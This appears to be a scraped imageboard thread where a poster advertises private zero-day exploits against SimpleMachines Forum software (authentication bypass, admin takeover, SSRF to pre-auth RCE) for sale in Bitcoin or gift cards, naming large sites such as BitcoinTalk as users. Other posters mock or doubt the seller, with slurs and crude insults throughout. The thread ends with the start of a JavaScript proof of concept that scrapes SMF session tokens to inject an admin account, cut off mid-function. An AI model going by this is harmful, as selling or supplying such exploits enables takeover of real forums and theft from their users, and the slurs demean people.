So, I have a private exploit (well, several viable exploits) for SimpleMachines forums. All versions are affected. I'm willing to sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked)
BitcoinTalk and some other relatively huge sites run this software (google to find some large examples)
I'll provide proof the exploits exist to any potentially serious buyer who can provide proof of funds. BTC or Amazon Gift Card only -- I'm selling this at $500 per copy since I plan to sell 10 copies in total (otherwise I'd want around $5k for this)
The exploits in question allow for authentication bypass, automated admin takeover, XSS, SSRF (Leading to pre-auth RCE), Post-Auth RCE, and a few other bugs.
If anyone is interested or has questions, let me know. If this thread dies you can contact me via email at [email protected]
Generally I'd sell this to Zerodium or ZDI, but these exploit brokers are currently not looking to purchase exploits affecting SMF.
>waaaaaaaaa why would you buy my useless shit > we're the crybabies
Jack Perry
back when I used chan boards there was no such thing as tags. This is indeed tech -- I'm willing to discuss the content of the exploits and how they work (just not revealing vuln endpoints or anything of the sort) - regarding your "scam" comment, as previously stated, I'm willing to use a trusted middleman or an escrow service
How do I know this isn't your website? For all I know you could just be the admin and could grep the access_log from your httpd in order to get my exploits for free.
James Martin
lmaooo so i think this comment demonstrates exactly how long its been since ive used Jow Forums
Go show me some of your own exploits before calling my shit uselses. I can happily provide scores of exploit CVE's I've published, and news reports accompanying my exploit releases... can you do the same?
Henry Morgan
Btw, I intend to start using Jow Forums on a regular basis (not just for advertisements)
if anyone is into webapp security, exploit development, and/or bug bounty hunting then hit me up.. maybe we can work on some cool stuff together :)
Caleb Butler
i can show you muh dick
Jose Cook
>sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked) Lmao, fucking retarded.
Zachary Howard
how do i know you didn't get your site raped with ""your"" exploit by someone else????
Ian Moore
user posts interesting technology thread on technology board, gets told to stop advertising by someone who'd rather argue about android vs iphone
TECHNOLOGY
Michael Sanchez
okay samefag, until OP doesn't record a webm of the thing in use I call BS and a scam he obviously just wants to advertise here to make money on an "exploit" that likely doesn't even exist.
I'm not asking for source code, but until he shows it being used on a live server this is some grade A+ plus ponzi scheme
Nothing about this thread is tech until OP delivers that demo recording.
Julian Carter
I guess you haven't had much experience selling 0day -- even the likes of giant exploit brokers such as Zerodium and TrendMicro's ZDI sell limited numbers of multiple copies to different buyers.
Well, you're just going to have to take my word for this. I can always show you some of my other (public) exploits that I've developed.
yeah I don't get it, this isn't *solely* an advertisement... I'm more than willing to discuss specifics and semantics here, or even just generic stuff like the process for auditing webapps to find 0days in general
Ethan Richardson
I'll quite happily post one of the lower impact exploits here (which can be used standalone to gain access if you have user interaction with an admin) but im not sharing a webm of me exploiting the SSRF because that would LITERALLY be giving you a step-by-step guide on how to get pre-auth RCE.
I'll post the proof of concept for the admin auth bypass if you wish though.
Benjamin Brown
You're literally posting about your 0days on a public website, how dumb can you be? But sure, show some of your other "exploits".
Austin Wilson
Provide at least some sort of PoC.
Elijah Perry
POST BOBS AND VAGENE
Cameron Diaz
I guess the super hacker ran away, time to sleep.
Dylan Bell
>25 posts >9 ip's Sad!
Samuel Lopez
Honestly this isnt the place (anymore). Too much moral faggotry, sheltered underage kids, and corporate shills who get scared at any and all mention of anything illegal. Also this board is tech illiterate, so any such technical exploit would be lost/wasted on them.
Jack Morris
find satoshi's IP from bitcointalk if ur so cool
Evan Taylor
>”i’m An e1337 h4x0r with over 5,000 confirmed kills” >using Jow Forums to advertise >thinking anyone here has any money >crying bc no one takes him seriously Imagine my shock.
Jaxson Miller
>crying bc no one takes him seriously No one takes chan seriously anymore (if pol shut down this site would probably die within a week)
Jason Brown
>if Jow Forums shut down god I can dream, less retards in my tech threads and no more paranoia
Cooper Roberts
What tech threads? There may be 1 actual tech thread on Jow Forums at the moment, everything else is just amdrone/incelinside/shill circle jerk
Jack Smith
Agreed, only jannies and retards like take it seriously. If Jow Forums was gone then we’d probably see right wing death squads or some shit spark up alongside Jow Forumsommandos itching for action.
Daniel Rogers
The programming thread? I actually see a lot of tech threads, just filter all threads with a female as OP image, a nujak/woja or a pepe. Ignore consumerist threads, desktop threads, dumbphone threads and headphone threads. Still leaves you with at least 30 topics that are worth to talk about. Your fault if you let the noise distract you, so you miss the information.
Jack Harris
get the god damn fuck off this board
Joshua Myers
key word, posting ABOUT my 0days, not posting my 0days. Astronomical difference here... how the fuck else do you think 0days get sold? You think buyers from ZDI aren't members of the public?
(pair this with XSS) function smfInjectAdmin(url, userid) { var session_key = document.body.innerHTML.match(/sSessionVar: '([a-f0-9]{10})'/)[1]; var session_value = document.body.innerHTML.match(/sSessionId: '([a-f0-9]{32})'/)[1]; var dongs = new XMLHttpRequest();